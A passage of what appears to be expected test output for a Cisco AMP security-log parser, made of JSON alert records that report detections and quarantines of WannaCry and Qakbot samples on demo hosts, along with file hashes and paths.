"file.path": "\\\\?\\C:\\Windows\\tasksche.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 0, + "process.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "process.name": "mssecsvc.exe", + "process.pid": 6404, + "related.hash": [ + "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa", + "84c82835a5d21bbcf75a61706d8ab549", + "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + 
"related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.error.description": "Delete pending", + "cisco.amp.error.error_code": 3221225558, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 862000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 1522, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + 
"cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.error.description": "Cannot delete", + "cisco.amp.error.error_code": 3221225761, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 659000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 2708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6419275390665097297", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 831000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + 
"event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 3893, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 706000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": 
"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\WINDOWS\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 5147, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Gen.20gl.1201", + "cisco.amp.detection_id": "6419275390665097295", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 643000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + 
"event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "db349b97c37d22f5ea1d1841e3c89eb4", + "file.hash.sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26", + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "file.name": "mssecsvc.exe", + "file.path": "\\\\?\\C:\\Windows\\mssecsvc.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6745, + "process.hash.md5": "4e568dbe3fff1a0025eb432dc929b78f", + "process.hash.sha1": "7abcc82dc5a05b4f53fd0fbd386738e5555025cf", + "process.hash.sha256": "26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71", + "process.name": "lsass.exe", + "process.pid": 708, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "db349b97c37d22f5ea1d1841e3c89eb4", + "e889544aff85ffaf8b0d0da705105dee7c97fe26" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T17:39:49.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419275390665097296", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 721000000, + "event.action": "Threat 
Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419275390665097000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 8343, + "related.hash": [ + "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 9463, + "related.hash": [ + 
"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484105", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 214000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 10645, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + 
"8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 183000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "6894b3834bd541fa85df79e44568acac", + "file.hash.sha1": "8cf0ca99a8f5019d8583133b9a9379299c45470c", + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "file.name": "MspthrdHash.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 12021, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "6894b3834bd541fa85df79e44568acac", + "8cf0ca99a8f5019d8583133b9a9379299c45470c" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + 
"service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:59:38.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411525251028484104", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 698000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411525251028484000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 13397, + "related.hash": [ + "bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + 
"cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 14506, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 779000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": 
"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 15718, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419204905956802579", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 716000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16930, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + 
"cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 888000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 18142, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419264043361501262", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + 
"cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 19266, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419264043361501261", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + 
"event.severity": 3, + "file.hash.md5": "7bf2b57f2a205768755c07f238fb32cc", + "file.hash.sha1": "45356a9dd616ed7161a3b9192e2f318d0ab5ad10", + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "@WanaDecryptor@.exe", + "file.path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\@WanaDecryptor@.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 20509, + "related.hash": [ + "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "7bf2b57f2a205768755c07f238fb32cc", + "45356a9dd616ed7161a3b9192e2f318d0ab5ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T16:55:47.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Ransom:Gen.20gl.1201", + "cisco.amp.detection_id": "6419229331435814969", + "cisco.amp.event_type_id": 553648147, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 763000000, + "event.action": "Retrospective Detection", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6419264043361501000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "file.name": "u.wnry", + 
